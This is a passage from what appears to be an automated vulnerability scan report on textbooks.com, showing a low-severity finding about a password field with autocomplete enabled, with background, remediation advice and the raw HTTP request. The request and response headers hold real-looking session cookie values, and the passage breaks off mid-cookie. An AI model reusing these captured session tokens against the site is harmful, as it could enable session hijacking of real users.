Set-Cookie: TBSESSION=GN%2Bu2RH0zu72InyE7yjEtHseOWko2s6C3Nnu%2Bel02ruAFXvxPxqzfstCuA9ufemgaVoW15o7ehfaiR3lXYev5Hl28gWQjGdp4r62cntl8Ppe%2BQB%2B%2F0PnTWSxzxnfeNqCXausL%2FDZQfxUHbZa9YobNMc8nhhywgxyfre46xwN%2FdJR8Nt8THau6QM%2FBcr5%2F541p6%2BsumwfXZERaEEcWeO7wcXn17Rv8%2FpFFZGks%2BIFbkjavKs9dmHpL7BrI2pt6sPQHd6b%2F2deduiP0eCPe1QyoIAGILwFRS1VriIsFzQzNIade%2BzmnH7SXXYtPwyEg9JZ4dcMkuab51A0Rbyy9BeTp%2FoQEc1rmertrtbWBb43SpmFMl1pXIEcwpTMwaOPsLcgAzKdCVWtHQM2y74Ilusj5dymYdWvCF0AFv72joZNh9xAOIj00moAbgiQvYm3YjgRybXPW9WGZyM%2BgfKSvc5swAJwYxW37jqjz99uCNVTm3zBmW39bUFF2gxAf3vZvMdxtqk5ozLzxiVXd0bxt4anKXczZx9bhqV9FBaehw5XylsCdUi3r%2Bvq1zaC5pHseIvr9%2BPEglegFQ%2B%2FcB%2Fdj5fO8ARg4iNt6%2FaYMgig5ah41Qu95hVCN7SsCNUFXdOlTgBfeobXgKKT0iSxNsimPxBfoTfpzMy%2Fby4BPcBbdT%2FfI1N3RhYOJLeAdCeujM8Zf2kK%2BQt5gzaEz7H0ARx%2FooJKRBqTMkKWw1Bbiu2usiUDsWDbH7mBiYYr5JoOUqU%2BgmlbkpdpH3IwQHihGE41zVNOEH44siHFWYUggG3CvTI3fDrDddZZgwv%2BaAdExM3QJScmaz2VVVGi7%2FXqU9OnyHVOusBLag9o5vRGT8SpjfoBv00CAehyb%2FnlDPlfmTR2ub2vbwjSxDFRz60oue41qDXfDZGyy8izPa293C2Uw98B2R7%2BxtYJBj895DBpW16w4bActPCnt2Fsxga7UPsKbwH5T5WruVPnmFOBV5GdnvIYNip%2Bt7kJhz1cg1pPGwRsVDHx5f4MMG70GQNe2HZGXDcb%2BPjlKHpSRYceIYzY1DbVka1dTaJ5HB7biPNlqni%2FRLgbvpxRYK4c4cUuwZw90NqaYAYBCZ2hXQBVYl%2FCi4xZnnjYBdK06nekOvzbvYBHOYXbbtnd4A1P0kMPaIJJEhLoeQBCR%2Bzb0%2Bs1d2Amp0nBVVDBvJEwSH6AeHJ2wNFvE%2BK9jjxqBBs0wqkLl%2F0OccXwsuWFBpSUUPPdJ4qm4Y8r%2FMp7FUkd6mjJblkV4kY%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=9vc8KFkiyfVkIilGB6Y%3D; expires=Mon, 26-Dec-2011 13:53:30 GMT; path=/; domain=.textbooks.com


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
   <meta name="ke
...[SNIP]...

5. Password field with autocomplete enabled

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.textbooks.com
Path:   /account.php

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

Request

GET /account.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2
